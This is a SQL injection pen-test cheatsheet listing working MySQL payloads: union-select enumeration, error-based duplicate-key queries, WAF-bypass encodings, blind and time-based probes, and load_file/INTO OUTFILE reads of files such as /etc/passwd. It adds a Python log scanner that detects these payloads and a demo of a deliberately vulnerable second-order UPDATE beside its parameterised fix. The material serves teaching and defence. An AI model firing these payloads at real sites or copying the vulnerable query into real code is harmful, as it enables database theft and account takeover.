Web Application & SQL Injection Pen Test cheatsheet by D7X

MySQL Injection


Strings to test for MySQL Injection (breaking the query)

'
"
')
")
\

A broken query typically produces an error such as:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"\" LIMIT 0,1' at line 1

Basic (error-based) Injection queries (breaking and fixing the query, enumerating tables)

?id=1' and '1
?id=1' %26%26 '1
?id=1'%a0%26%26'1
?id=1' or '1
?id=1') or '1
?id=1') --+
?id=1") #
?id=1' or 1='1
?id=1' order by 1#
?id=1' order by 1--+
?id=1 order by 1--+
?id=1 order by 1#
?id=1' --+
?id=1' #
") #
?id=1' union all select 1,2,3 --+
?id=1' union all select 1,2,3 #
?id=1' union all select 1,(select table_name from information_schema.tables where table_schema=database()),database() #
?id=1' union all select 1,(select column_name from information_schema.columns where table_name='users'),database() #
?id=1' union all select 1,group_concat(username),group_concat(password) from TABLE --+

#, --+ and /* comment out the rest of the query.
A "union all select" can be injected into the above queries to redesign the query and get the result from its second part; the id then has to be altered to a "false" value (for example -1 or 0) so that the first part returns nothing.
The above injections apply where ' is used as the quote symbol; for a " based query substitute the single quote with a double quote (1" or "1).
Use group_concat() and concat() to group multiple results into one, e.g. group_concat(username, concat(0x3a, password)).

Double query (duplicate key) Injection

1' AND (select 1 from (select ...)) #

1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
  Duplicate entry '::users::1' for key 'group_key'

1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
  Duplicate entry '::users::0' for key 'group_key'

1' AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
  Duplicate entry '::emails::0' for key 'group_key'
  Subquery returns more than 1 row

1" and (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)a) --+
  Duplicate entry '::10.1.29-MariaDB-6::0' for key 'group_key'

1" and (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
  Duplicate entry '::emails::0' for key 'group_key'

1" AND (select 1 from ((select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a))b) --+
  Duplicate entry '::emails::1' for key 'group_key'

1" AND (select 1 from ((select count(*), concat(0x3a,0x3a,(select database() limit 0,1), 0x3a,floor(rand()*2))a from information_schema.tables group by a))b) --+
  Duplicate entry '::somerandomdb::1' for key 'group_key'
  Subquery returns more than 1 row

" AND (select 1 from (select count(*), (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
  Duplicate entry '::somerandomdb::1' for key 'group_key'

To reach a duplicate entry the page may need to be refreshed a few times, since the collision depends on rand().
Used when no query fields are reflected in the output but MySQL errors are displayed.

Bypassing WAF

?id=0%27%a0uNion%a0all%a0sElect%a01,(select%20load_file(0x2f6574632f706173737764)),3%26%26%20%271

decoded (%a0 is a non-breaking space, shown here as a normal space):
?id=0' uNion all sElect 1,(select load_file(0x2f6574632f706173737764)),3&& '1

Substituted strings:
%a0 replaces the space
union all select -> union(all(select(...)))
blacklisted quotes and/or slashes: load_file('/etc/passwd') -> load_file(0x2f6574632f706173737764)

Substitutes for blacklisted keywords: oorr, anandd (survive a filter that strips the keyword once), o/* */r, uNiOn or Or (CaMel CaSe)

BlindSQLI queries

1' AND (select statement with bool result) #
1' AND (select ascii(substr(database(),2,1)) = 97) #
1' AND (select (substr(version(),1,2)) = '10') #

The normal result is returned only when both the first and the second statement are true.

BlindSQLI (time-based) queries

1' AND SLEEP(5) #
1' AND select if ( (select version()) like '5%', sleep(15), null) #
1' AND (select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1) = 'e', sleep(10), null)) #

The delayed response is observed only when both the first and the second statement are true.

Dumping data using OUTFILE and LOAD_FILE()

1' AND select * from users into outfile "/tmp/sensitive.txt" #
1' AND select load_file('/etc/passwd') into dumpfile "/etc/passwd.txt" #
1' AND select load_file(0x2f6574632f706173737764) #
1' AND select load_file(0x2f6574632f706173737764) into outfile "/tmp/passwd.txt" #
1' AND select load_file(0x2f6574632f706173737764) into outfile "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x2e\x74\x78\x74" #

INTO DUMPFILE writes only one row to the file, without any escape processing or line termination (useful for BLOBs).
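From the defender's side, every payload family above (quote breaks, union/select, information_schema enumeration, comment terminators, sleep()-based probes, floor(rand()) duplicate-key tricks, load_file/outfile) leaves a recognisable shape in the request once the WAF-bypass tricks are undone: URL-decode twice, fold case, drop inline comments and collapse whitespace including %a0. The following Python is an added example, not part of the original cheatsheet; it normalises query parameters that way, scans them for those indicators and, for time-based probes, confirms the hit against the server's response time. It assumes an nginx/Apache style access log whose last field is the response time in seconds; the log lines and IPs are constructed for the demo.

```python
"""Added example: normalise request parameters the way a WAF/log parser should,
then look for the SQL injection indicator families from the cheatsheet."""
import re
from urllib.parse import parse_qsl, unquote

# Indicators are matched against the NORMALISED value: lower-case, fully
# URL-decoded, comments removed, all whitespace (including %a0 / NBSP) collapsed.
INDICATORS = {
    # a quote or closing paren followed by a boolean/union keyword: the
    # "broke out of the string" shape (1' and '1, 1') or '1, 1' && '1, 0' union ...)
    "quote_break": re.compile(r"['\")]\s*((or|and|union|select)\b|&&|\|\|)"),
    "union_select": re.compile(r"\bunion\b.{0,20}\bselect\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "comment_terminator": re.compile(r"--(\s|\+|$)|\s#\s*$|/\*"),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "duplicate_key": re.compile(r"floor\s*\(\s*rand\s*\("),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b"),
}


def normalise(value: str) -> str:
    """Undo the evasions listed under 'Bypassing WAF' before matching."""
    s = unquote(value, encoding="latin-1")        # second decode pass: double-encoded input
    s = re.sub(r"/\*!\d*", "", s)                 # MySQL version comment /*!50000...*/: keep its body
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)   # ordinary inline comment: drop it (o/* */r -> or)
    s = s.replace("*/", "")
    s = s.lower()                                 # defeats uNiOn / CaMeL cAsE
    return re.sub(r"\s+", " ", s).strip()        # \s matches NBSP (%a0) for str patterns


def scan_query(query_string: str) -> dict:
    """Return {parameter: sorted list of indicator names} for suspicious parameters."""
    findings = {}
    # latin-1 keeps %a0 as U+00A0 instead of turning it into U+FFFD under utf-8
    for name, raw in parse_qsl(query_string, keep_blank_values=True, encoding="latin-1"):
        value = normalise(raw)
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(value))
        if hits:
            findings[name] = hits
    return findings


# Constructed access-log lines (combined format + $request_time as last field).
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 0.012',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=1%27%20and%20%271 HTTP/1.1" 200 512 0.011',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /item.php?id=0%27%a0uNion%a0all%a0sElect%a01,(select%20load_file(0x2f6574632f706173737764)),3%26%26%20%271 HTTP/1.1" 500 221 0.015',
    '203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /item.php?id=1%27%20AND%20SLEEP(5)%20%23 HTTP/1.1" 200 512 5.013',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /item.php?id=42 HTTP/1.1" 200 498 0.010',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ ([\d.]+)$')


def analyse_log(lines, slow_seconds: float = 3.0) -> list:
    """One result dict per parsable line; time-based probes are confirmed by the stall."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status, rtime = m.groups()
        path, _, qs = target.partition("?")
        findings = scan_query(qs)
        rtime = float(rtime)
        results.append({
            "ip": ip, "path": path, "status": int(status), "response_time": rtime,
            "findings": findings,
            "time_based_confirmed": any("time_based" in h for h in findings.values())
            and rtime >= slow_seconds,
        })
    return results


if __name__ == "__main__":
    for r in analyse_log(LOG_LINES):
        if r["findings"]:
            print(r["ip"], r["path"], r["findings"], "STALLED" if r["time_based_confirmed"] else "")
```

The response-time correlation matters because a sleep() payload that is blocked or broken produces no delay; only the combination of the indicator and the stall shows that the injected statement actually executed.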
INTO OUTFILE cannot be used together with the 0x hex-literal format for the file name.

UPDATE (Second Order) Injection

admin'--  (register as)

Second Order Injection is used to register as an unfiltered user (i.e. admin'--) and then change sensitive details for admin: the stored username is later trusted and placed unescaped into an UPDATE statement, so the trailing -- comments out the rest of the WHERE clause and the real admin row is modified.
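The second-order case above is the one developers miss most often, because the dangerous value never arrives from a form at the moment it does harm: it was safely stored earlier and is trusted when read back. The following Python is an added example, not code from the original cheatsheet; it reproduces the scenario in an in-memory SQLite database (which accepts the same -- line comment as MySQL) with the vulnerable string-built UPDATE beside its parameterised fix. The users table, column names and passwords are constructed for the demo.

```python
"""Added example: second-order injection via a stored username, vulnerable vs fixed."""
import sqlite3


def fresh_db() -> sqlite3.Connection:
    # Constructed schema: one pre-existing privileged account.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'admin-original', 'admin')")
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # Registration is parameterised, so the name admin'-- is stored verbatim.
    # That is exactly what enables the second-order problem: the dangerous
    # characters now live inside the database as "trusted" data.
    con.execute("INSERT INTO users VALUES (?, ?, 'user')", (username, password))


def change_password_vulnerable(con: sqlite3.Connection, username: str, new_password: str) -> str:
    # The username comes from the session (i.e. from the DB), so the developer
    # trusts it and concatenates. With username = admin'-- the statement becomes
    #   UPDATE users SET password = 'owned' WHERE username = 'admin'--'
    # and everything after -- is a comment: the real admin row is updated.
    sql = "UPDATE users SET password = '%s' WHERE username = '%s'" % (new_password, username)
    con.execute(sql)
    return sql


def change_password_fixed(con: sqlite3.Connection, username: str, new_password: str) -> str:
    # Parameterise every statement, not only those fed directly from a form.
    sql = "UPDATE users SET password = ? WHERE username = ?"
    con.execute(sql, (new_password, username))
    return sql


def password_of(con: sqlite3.Connection, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]


def demo(fixed: bool) -> dict:
    """Register admin'--, then change 'own' password; return both rows' passwords."""
    con = fresh_db()
    register(con, "admin'--", "attacker-pw")
    change = change_password_fixed if fixed else change_password_vulnerable
    change(con, "admin'--", "owned")
    return {"admin": password_of(con, "admin"), "admin'--": password_of(con, "admin'--")}


if __name__ == "__main__":
    print("vulnerable:", demo(fixed=False))   # the admin row is the one that changes
    print("fixed:     ", demo(fixed=True))    # only the attacker's own row changes
```

The fix is not input filtering at registration time (that is what the cheatsheet's "unfiltered user" relies on failing) but binding parameters on every statement that touches the value, however trusted its source looks.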